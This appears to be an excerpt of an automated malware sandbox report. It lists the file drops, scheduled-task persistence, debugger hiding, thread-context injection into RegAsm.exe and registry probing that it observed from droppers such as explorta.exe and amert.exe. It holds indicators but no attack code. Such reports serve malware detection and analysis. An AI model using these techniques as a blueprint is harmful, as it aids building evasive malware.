File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_F71C9FE0DBB76538B4EB93E5DEE9B878 C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\DkQSqMw.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\DkQSqMw.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_5C77EC0FCAF0A83EAAF0F4351F61FA27 C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\DkQSqMw.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_F71C9FE0DBB76538B4EB93E5DEE9B878 C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\DkQSqMw.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\DkQSqMw.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\DkQSqMw.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\DkQSqMw.exe N/A
File opened for modification C:\Windows\system32\DRVSTORE C:\Windows\System32\MsiExec.exe N/A
File created C:\Windows\system32\DRVSTORE\VBoxDrv_A74DBC1DC66E4A6300641C79D3B73B2FD2C2E5F9\VBoxDrv.cat C:\Windows\System32\MsiExec.exe N/A
File opened for modification C:\Windows\System32\CatRoot2\dberr.txt C:\Windows\System32\MsiExec.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\DkQSqMw.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_5C77EC0FCAF0A83EAAF0F4351F61FA27 C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\DkQSqMw.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\DkQSqMw.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\Pictures\V7w4GBUasgpenxOz5JxWuHLp.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\DkQSqMw.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\DkQSqMw.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\DkQSqMw.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\DkQSqMw.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\DkQSqMw.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\DkQSqMw.exe N/A
File created C:\Windows\system32\DRVSTORE\VBoxDrv_A74DBC1DC66E4A6300641C79D3B73B2FD2C2E5F9\VBoxDrv.sys C:\Windows\System32\MsiExec.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\Pictures\V7w4GBUasgpenxOz5JxWuHLp.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\7zS40FC.tmp\Install.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\DkQSqMw.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\DkQSqMw.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini C:\Users\Admin\Pictures\V7w4GBUasgpenxOz5JxWuHLp.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\DkQSqMw.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_91B924923180E8714F1EDBCBF8DDC70F C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\DkQSqMw.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\DkQSqMw.exe N/A
File created C:\Windows\system32\DRVSTORE\VBoxDrv_A74DBC1DC66E4A6300641C79D3B73B2FD2C2E5F9\VBoxDrv.inf C:\Windows\System32\MsiExec.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\DkQSqMw.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_91B924923180E8714F1EDBCBF8DDC70F C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\DkQSqMw.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\cdec8d4c23ee4137e25482264032a1fa51366c1eae736e7bd1146d59c4c9ed09.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000015001\amert.exe N/A
N/A N/A C:\Users\Admin\1000017002\dfb8c0b47f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A
N/A N/A C:\Users\Admin\Pictures\V7w4GBUasgpenxOz5JxWuHLp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2804 set thread context of 1208 N/A C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
PID 5836 set thread context of 5928 N/A C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 452 set thread context of 3216 N/A C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5784 set thread context of 5916 N/A C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5784 set thread context of 5404 N/A C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4136 set thread context of 1680 N/A C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Oracle\VirtualBox\UnattendedTemplates\debian_preseed.cfg C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\Qt5GuiVBox.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\drivers\vboxdrv\VBoxDrv.sys C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_lt.qm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\x86\VBoxClient-x86.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\qIYKRzUEasUn\oCUCRqB.dll C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\DkQSqMw.exe N/A
File created C:\Program Files\Oracle\VirtualBox\Qt5PrintSupportVBox.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\nls\qt_pl.qm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ecOJmsgAHWlsC\cvZBTKB.dll C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\DkQSqMw.exe N/A
File created C:\Program Files\Oracle\VirtualBox\UnattendedTemplates\debian_postinstall.sh C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\VBoxHeadless.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\x86\VBoxProxyStub-x86.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\VirtualBox.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\VBoxAutostartSvc.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\nls\qt_en.qm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\nls\qt_ru.qm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\VBoxGuestAdditions.iso C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\VBoxNetNAT.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_el.qm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\nls\qt_cs.qm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\nls\qt_ko.qm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\vbox-img.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_en.qm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_hu.qm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\UnattendedTemplates\ol_ks.cfg C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\doc\UserManual.pdf C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\VBoxDDR0.r0 C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\VBoxNetNAT.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_zh_CN.qm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\UnattendedTemplates\redhat67_ks.cfg C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ecOJmsgAHWlsC\hSfCpaE.xml C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\DkQSqMw.exe N/A
File created C:\Program Files\Oracle\VirtualBox\VBoxSDL.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\UnattendedTemplates\lgw_ks.cfg C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_ca.qm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_de.qm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_pt_BR.qm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\VBoxGuestPropSvc.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\nls\qt_ja.qm C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\DkQSqMw.exe N/A
File created C:\Program Files (x86)\zgoZGMcaU\BmSHugr.xml C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\DkQSqMw.exe N/A
File created C:\Program Files\Oracle\VirtualBox\UnattendedTemplates\fedora_ks.cfg C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\Qt5OpenGLVBox.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\VBoxCAPI.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\VBoxDragAndDropSvc.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\nls\qt_el.qm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\nls\qt_hr_HR.qm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\gtxviqO.dll C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\DkQSqMw.exe N/A
File created C:\Program Files\Oracle\VirtualBox\VBoxAuth.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\VBoxDbg.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\VBoxDD.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\VBoxRes.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\VBoxSDL.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\VBoxSharedClipboard.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\nls\qt_th.qm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\VBoxSVC.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\zgoZGMcaU\SpabVJ.dll C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\DkQSqMw.exe N/A
File created C:\Program Files (x86)\epoBtGYzqLvU2\xnYLPJK.xml C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\DkQSqMw.exe N/A
File created C:\Program Files\Oracle\VirtualBox\Qt5WidgetsVBox.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\VBoxDD2.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\nls\qt_ca.qm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\nls\qt_de.qm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Oracle\VirtualBox\nls\qt_pt_BR.qm C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\DkQSqMw.exe N/A
File created C:\Program Files\Oracle\VirtualBox\platforms\qoffscreen.dll C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\biPxHmULFllsbMgnpt.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\yfARWRprRqUFWeTGf.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\JHJXtPPPvDXVqpH.job C:\Windows\SysWOW64\schtasks.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{B4A28DF2-D2C0-4956-A34A-4D77BA2932CC} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI4F5F.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\{B4A28DF2-D2C0-4956-A34A-4D77BA2932CC}\IconVirtualBox C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI6A2C.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI6FAB.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\{B4A28DF2-D2C0-4956-A34A-4D77BA2932CC}\IconVirtualBox C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Tasks\chrosha.job C:\Users\Admin\AppData\Local\Temp\1000015001\amert.exe N/A
File created C:\Windows\Tasks\biPxHmULFllsbMgnpt.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Installer\e59431a.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI4A8C.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Tasks\explorta.job C:\Users\Admin\AppData\Local\Temp\cdec8d4c23ee4137e25482264032a1fa51366c1eae736e7bd1146d59c4c9ed09.exe N/A
File created C:\Windows\Tasks\aNyMQclguOCSCcjxm.job C:\Windows\SysWOW64\schtasks.exe N/A
File opened for modification C:\Windows\Installer\e59431a.msi C:\Windows\system32\msiexec.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS40FC.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS44FE.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS44FE.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS40FC.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\MsiExec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Users\Admin\AppData\Local\Temp\7zS44FE.tmp\Install.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\MsiExec.exe N/A
